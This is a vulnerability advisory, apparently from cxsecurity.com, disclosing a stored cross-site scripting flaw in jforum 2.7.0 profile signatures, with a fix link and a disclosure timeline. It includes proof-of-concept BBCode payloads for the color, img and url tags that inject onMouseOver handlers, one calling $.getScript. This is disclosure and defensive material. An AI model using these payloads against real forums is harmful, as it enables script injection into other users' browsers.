jforum 2.7.0 Cross Site Scripting

Credit: Kun Song
Risk: Low
Local: No
Remote: Yes

hi, I found a vulnerability in the jforum 2.7.0. It is a storage cross site script vulnerability. The place is the user's profile - signature. The technique of the vulnerability is the same as that described in this article "STORED CROSS SITE SCRIPTING IN BBCODE" ( https://mindedsecurity.com/advisories/msa130510/), and the POC is: color tag: [color=red" onMouseOver="alert('xss')]XSS[/color] [color=red" onMouseOver="$.getScript('') ;"]XSS[/color] Renders into HTML: <font onmouseover="alert('xss')" color="red">XSS</font> <font onmouseover="$.getScript('');" color="red">XSS</font> img tag: [img]/demo.jpg" onMouseOver="alert('xss')[/img] Renders into HTML: <img src="/demo.jpg" onmouseover="alert('xss')" alt="image"> url= tag: [url='http://www.demo.com" onMouseOver="alert('xss')']test[/url] Renders into HTML: <a class="snap_shots" href="http://www.demo.com" onmouseover="alert('xss')" target="_blank">test</a> through analysis, the forum has set the cookie to http-only, but the attacker can use the $.getScript to do some evil things. this vulnerability has been fixed in https://sourceforge.net/p/jforum2/code/934/ . timeline: 2021-04-21 announce the developer of Jforum by e-mail 2021-04-22 Jforum fixed the vulnerability, and will include this fix in next release 2021-09-02 send this mail to bugtraq&fulldisclosure

Vote for this issue:


Thanks for you vote!


Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.

(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2021, cxsecurity.com


Back to Top